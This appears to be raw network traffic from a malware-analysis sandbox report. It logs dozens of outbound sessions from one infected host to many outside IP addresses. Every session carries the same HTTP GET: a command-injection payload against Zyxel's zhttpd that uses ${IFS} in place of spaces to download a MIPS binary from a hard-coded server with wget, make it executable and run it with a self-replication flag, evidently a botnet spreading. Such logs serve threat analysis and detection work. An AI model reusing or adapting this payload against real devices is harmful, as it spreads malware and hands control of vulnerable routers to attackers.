                                                Jan 28, 2024 10:16:10.592128992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                682192.168.2.2339680193.228.214.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592147112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                683192.168.2.2360566150.176.69.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592170000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                684192.168.2.2355226115.144.237.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592197895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                685192.168.2.2354860140.226.214.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592219114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                686192.168.2.2359746223.253.34.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592241049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                687192.168.2.2359798114.175.5.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592278004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                688192.168.2.2357088191.118.199.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592303038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                689192.168.2.2340558107.173.61.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592343092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                690192.168.2.235636019.204.151.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592366934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                691192.168.2.233881258.88.101.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592401028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                692192.168.2.235754646.24.49.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592402935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                693192.168.2.2352642116.233.15.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592420101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                694192.168.2.2346336151.63.59.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592468977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                695192.168.2.235936096.70.129.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592497110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                696192.168.2.2338942147.80.221.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592503071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                697192.168.2.2339948203.184.157.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592530012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                698192.168.2.234510440.227.73.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592555046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                699192.168.2.2356988155.190.244.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592586994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                700192.168.2.23504144.67.64.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592612028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                701192.168.2.2348012198.230.9.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592633009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                702192.168.2.235994494.222.140.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592669964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                703192.168.2.2340860105.210.56.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592699051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                704192.168.2.235326694.52.219.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592719078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                705192.168.2.235404280.59.62.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592751026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                706192.168.2.2356024219.25.29.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592756033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                707192.168.2.234016078.245.233.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592784882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                708192.168.2.234796040.187.21.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592803001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                709192.168.2.234449032.129.68.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592837095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                710192.168.2.2336186222.69.80.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592854977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                711192.168.2.235515625.94.177.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592870951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                712192.168.2.235400662.181.30.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592902899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                713192.168.2.2336274187.213.243.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592931032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                714192.168.2.2356912198.2.113.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592973948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                715192.168.2.234941869.89.246.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592989922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                716192.168.2.23532764.123.202.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593002081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                717192.168.2.2339672173.154.29.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593025923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                718192.168.2.235369244.106.2.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593033075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                719192.168.2.233517283.106.189.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593085051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                720192.168.2.2347384119.109.15.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593107939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                721192.168.2.2359002126.33.16.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593135118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                722192.168.2.235963858.123.251.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593153000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                723192.168.2.2346104211.17.172.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593163013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                724192.168.2.234888480.20.156.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593236923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                725192.168.2.233405279.115.59.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593245029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                726192.168.2.2357888131.154.33.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593259096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                727192.168.2.234875279.51.144.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593283892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                728192.168.2.2338188110.128.43.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593348026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                729192.168.2.2334374128.59.90.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593357086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                730192.168.2.2344640199.85.60.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593393087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                731192.168.2.234108094.60.128.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593417883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                732192.168.2.2332834207.94.38.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593440056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                733192.168.2.2351254211.179.130.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593472958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                734192.168.2.23364625.195.248.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593498945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                735192.168.2.2352358212.81.151.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593525887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                736192.168.2.2339664212.51.178.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593574047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                737192.168.2.2341474114.195.171.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593605995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                738192.168.2.234080876.198.46.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593631983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                739192.168.2.234556890.188.108.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593645096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                740192.168.2.235086412.104.175.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593668938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                741192.168.2.23384524.234.122.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593683004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                742192.168.2.2336388137.153.194.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.593700886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                743192.168.2.235364019.224.248.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596023083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
